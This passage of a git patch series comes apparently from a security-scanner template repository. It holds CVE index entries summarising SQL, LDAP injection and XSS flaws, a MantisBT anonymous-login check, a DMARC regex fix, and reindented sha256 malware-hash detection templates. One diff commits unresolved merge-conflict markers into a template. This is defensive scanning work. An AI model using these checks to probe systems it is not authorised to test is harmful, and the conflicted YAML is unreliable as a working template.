Error-Based.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3552.yaml"} {"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index ec20a23695..2d5ebc9b40 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -0179f5035edf290e319fa948308df7ad +a0314be23fea3fd21e58a890fbcccb36 From b6951c85dcf3f0f1183c8ce059be0bfdc8709a58 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 17:32:53 +0530 Subject: [PATCH 0464/1841] Update mantisbt-anonymous-login.yaml --- http/default-logins/mantisbt-anonymous-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt-anonymous-login.yaml index 818443dfef..e4627216de 100644 --- a/http/default-logins/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt-anonymous-login.yaml @@ -25,6 +25,7 @@ http: - 'user-info">anonymous"' - 'My View' - 'Roadmap' + condition: and - type: status status: From de8270203187db1a89eee1eb57e1e326557acc82 Mon Sep 17 00:00:00 2001 From: Vikas Gupta Date: Thu, 20 Jun 2024 17:46:22 +0530 Subject: [PATCH 0465/1841] Update dmarc-detect.yaml --- dns/dmarc-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index cdb70ed656..df3d73d376 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -24,12 +24,12 @@ dns: - type: regex part: answer regex: - - "IN\tTXT\\t(.+)$" + - "IN\tTXT\\t(.+DMARC.+)$" extractors: - type: regex group: 1 regex: - - "IN\tTXT\t(.+)" + - "IN\tTXT\t(.+DMARC.+)" # digest: 4a0a0047304502204076c7a56a64102033ddcbffe604e0099b21d4e3fc93681f25db84b6c9ea0d49022100cc84a29967d71f3d07b107990f34ec5d804757336391661727adf79dc07eef3d:922c64590222798bb761d5b6d8e72950 From 99d2fc0f6574258d70152aea4958e4f4a64a62f0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 18:08:35 +0530 Subject: [PATCH 0466/1841] update --- .../hash/anthem-deeppanda-malware-hash.yaml | 14 ++--- .../hash/blackenergy-driver-amdide-hash.yaml | 24 ++++---- .../hash/blackenergy-driver-malware-hash.yaml | 26 ++++---- .../hash/bluetermite-emdivi-malware-hash.yaml | 40 ++++++------- .../hash/bluetermite-emdivi-sfx-hash.yaml | 14 ++--- .../hash/cheshirecat-malware-hash.yaml | 18 +++--- file/malware/hash/cloudduke-malware-hash.yaml | 40 ++++++------- file/malware/hash/codoso-gh0st-malware.yaml | 18 +++--- file/malware/hash/codoso-malware-hash.yaml | 22 +++---- .../malware/hash/codoso-pgv-malware-hash.yaml | 18 ++++-- .../hash/codoso-plugx-malware-hash.yaml | 18 +++--- file/malware/hash/dubnium-malware-hash.yaml | 58 +++++++++--------- .../hash/dubnium-sshopenssl-malware-hash.yaml | 22 +++---- file/malware/hash/emissary-malware-hash.yaml | 36 +++++------ file/malware/hash/fakem-malware-hash.yaml | 33 +++++----- file/malware/hash/furtim-malware-hash.yaml | 14 ++--- file/malware/hash/greenbug-malware-hash.yaml | 34 +++++------ .../hash/industroyer-malware-hash.yaml | 28 ++++----- .../hash/ironPanda-htran-malware-hash.yaml | 10 ++-- .../ironpanda-dnstunclient-malware-hash.yaml | 10 ++-- file/malware/hash/ironpanda-malware-hash.yaml | 18 +++--- file/malware/hash/locky-ransomware-hash.yaml | 10 ++-- .../minidionis-readerview-malware-hash.yaml | 22 +++---- .../hash/minidionis-vbs-malware-hash.yaml | 10 ++-- .../malware/hash/naikon-apt-malware-hash.yaml | 14 ++--- file/malware/hash/neuron2-malware-hash.yaml | 14 ++--- file/malware/hash/oilrig-malware-hash.yaml | 60 +++++++++---------- .../hash/passcv-ntscan-malware-hash.yaml | 10 ++-- .../hash/passcv-sabre-malware-hash.yaml | 28 ++++----- .../hash/passcv-signingcert-malware-hash.yaml | 10 ++-- file/malware/hash/petya-ransomware-hash.yaml | 8 +-- .../poseidongroup-maldoc-malware-hash.yaml | 26 ++++---- .../hash/poseidongroup-malware-hash.yaml | 24 ++++---- .../malware/hash/purplewave-malware-hash.yaml | 28 ++++----- .../malware/hash/red-leaves-malware-hash.yaml | 10 ++-- file/malware/hash/revil-ransomware-hash.yaml | 17 +++--- file/malware/hash/rokrat-malware-hash.yaml | 8 +-- file/malware/hash/sauron-malware-hash.yaml | 24 ++++---- file/malware/hash/seaduke-malware-hash.yaml | 10 ++-- file/malware/hash/sfx1-malware-hash.yaml | 14 ++--- .../hash/sfxrar-acrotray-malware-hash.yaml | 16 ++--- .../hash/sofacy-Winexe-malware-hash.yaml | 10 ++-- .../hash/sofacy-bundestag-malware-hash.yaml | 14 ++--- .../hash/sofacy-fybis-malware-hash.yaml | 16 ++--- file/malware/hash/tidepool-malware-hash.yaml | 18 +++--- file/malware/hash/turla-malware-hash.yaml | 30 +++++----- file/malware/hash/unit78020-malware-hash.yaml | 22 +++---- .../hash/wildneutron-malware-hash.yaml | 32 +++++----- 48 files changed, 516 insertions(+), 504 deletions(-) diff --git a/file/malware/hash/anthem-deeppanda-malware-hash.yaml b/file/malware/hash/anthem-deeppanda-malware-hash.yaml index bda4cb8072..d3ade4ee2c 100644 --- a/file/malware/hash/anthem-deeppanda-malware-hash.yaml +++ b/file/malware/hash/anthem-deeppanda-malware-hash.yaml @@ -10,12 +10,12 @@ info: tags: malware,deeppanda file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" - - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" + - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" + condition: or diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index 1416dfb755..0bdfde5343 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -8,17 +8,17 @@ info: tag: malware,blackenergy file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614'" - - "sha256(raw) == '3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2'" - - "sha256(raw) == '90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c'" - - "sha256(raw) == '97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1'" - - "sha256(raw) == '5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc'" - - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" - - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614'" + - "sha256(raw) == '3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2'" + - "sha256(raw) == '90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c'" + - "sha256(raw) == '97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1'" + - "sha256(raw) == '5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc'" + - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" + - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" + condition: or diff --git a/file/malware/hash/blackenergy-driver-malware-hash.yaml b/file/malware/hash/blackenergy-driver-malware-hash.yaml index 7f3f98507e..ba0cc65e80 100644 --- a/file/malware/hash/blackenergy-driver-malware-hash.yaml +++ b/file/malware/hash/blackenergy-driver-malware-hash.yaml @@ -9,18 +9,18 @@ info: tags: malware,blackenergy file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094'" - - "sha256(raw) == 'b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a'" - - "sha256(raw) == 'edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281'" - - "sha256(raw) == 'ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc'" - - "sha256(raw) == '7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291'" - - "sha256(raw) == '405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5'" - - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" - - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094'" + - "sha256(raw) == 'b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a'" + - "sha256(raw) == 'edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281'" + - "sha256(raw) == 'ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc'" + - "sha256(raw) == '7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291'" + - "sha256(raw) == '405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5'" + - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" + - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" + condition: or diff --git a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml index 040782d212..964d0dc509 100644 --- a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml @@ -9,25 +9,25 @@ info: tags: malware,bluetermite file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" - - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" - - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" - - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" - - "sha256(raw) == '9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1'" - - "sha256(raw) == 'a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012'" - - "sha256(raw) == '9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4'" - - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" - - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" - - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" - - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" - - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" - - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" - - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" - - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == '9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1'" + - "sha256(raw) == 'a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012'" + - "sha256(raw) == '9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml index 05e5bb88e2..22a895caa0 100644 --- a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml @@ -9,12 +9,12 @@ info: tags: malware,bluetermite file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" - - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" + - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" + condition: or diff --git a/file/malware/hash/cheshirecat-malware-hash.yaml b/file/malware/hash/cheshirecat-malware-hash.yaml index 351a05e2fb..f1e02e0ecc 100644 --- a/file/malware/hash/cheshirecat-malware-hash.yaml +++ b/file/malware/hash/cheshirecat-malware-hash.yaml @@ -9,14 +9,14 @@ info: tags: malware,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300'" - - "sha256(raw) == '32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a'" - - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" - - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300'" + - "sha256(raw) == '32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a'" + - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" + - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" + condition: or diff --git a/file/malware/hash/cloudduke-malware-hash.yaml b/file/malware/hash/cloudduke-malware-hash.yaml index 5d753b6036..3b155c5fbf 100644 --- a/file/malware/hash/cloudduke-malware-hash.yaml +++ b/file/malware/hash/cloudduke-malware-hash.yaml @@ -9,25 +9,25 @@ info: tags: malware,apt file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-gh0st-malware.yaml b/file/malware/hash/codoso-gh0st-malware.yaml index 51dbbc7495..39268274b4 100644 --- a/file/malware/hash/codoso-gh0st-malware.yaml +++ b/file/malware/hash/codoso-gh0st-malware.yaml @@ -9,14 +9,14 @@ info: tags: malware,apt,codoso file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd'" - - "sha256(raw) == '5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841'" - - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" - - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd'" + - "sha256(raw) == '5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841'" + - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" + - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" + condition: or diff --git a/file/malware/hash/codoso-malware-hash.yaml b/file/malware/hash/codoso-malware-hash.yaml index 4486e11cce..53e46b086d 100644 --- a/file/malware/hash/codoso-malware-hash.yaml +++ b/file/malware/hash/codoso-malware-hash.yaml @@ -11,16 +11,16 @@ info: tags: malware,apt,codoso file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == 'ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0'" - - "sha256(raw) == '130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8'" - - "sha256(raw) == '3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa'" - - "sha256(raw) == '02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13'" - - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" - - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == 'ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0'" + - "sha256(raw) == '130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8'" + - "sha256(raw) == '3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa'" + - "sha256(raw) == '02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13'" + - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" + - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" + condition: or diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index dad250bf30..c6612ab3fd 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -4,21 +4,31 @@ info: author: pussycat0x severity: info description: | - Detects Codoso APT PGV_PVID Malware - reference: + Detects Codoso APT PGV_PVID Malware. + reference: - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar tags: malware,apt,codoso file: - extensions: + - extensions: - all matchers: +<<<<<<< HEAD + - type: dsl + dsl: + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" + - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + condition: or +======= type: dsl dsl: - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - condition: or \ No newline at end of file + condition: or +>>>>>>> 687b9c6e63b39e715ed31005f70c97b54fd44c8e diff --git a/file/malware/hash/codoso-plugx-malware-hash.yaml b/file/malware/hash/codoso-plugx-malware-hash.yaml index f0884b566b..272333b851 100644 --- a/file/malware/hash/codoso-plugx-malware-hash.yaml +++ b/file/malware/hash/codoso-plugx-malware-hash.yaml @@ -11,14 +11,14 @@ info: tags: malware,apt,codoso file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - - "sha256(raw) == 'b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb'" - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - condition: or + - type: dsl + dsl: + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == 'b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + condition: or diff --git a/file/malware/hash/dubnium-malware-hash.yaml b/file/malware/hash/dubnium-malware-hash.yaml index fdfa9dcd68..5d8aa8e443 100644 --- a/file/malware/hash/dubnium-malware-hash.yaml +++ b/file/malware/hash/dubnium-malware-hash.yaml @@ -10,34 +10,34 @@ info: tags: malware,dubnium file: - extensions: - - all + - extensions: + - all matchers: - type: dsl - dsl: - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == 'caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8'" - - "sha256(raw) == 'e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5'" - - "sha256(raw) == 'a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827'" - - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - 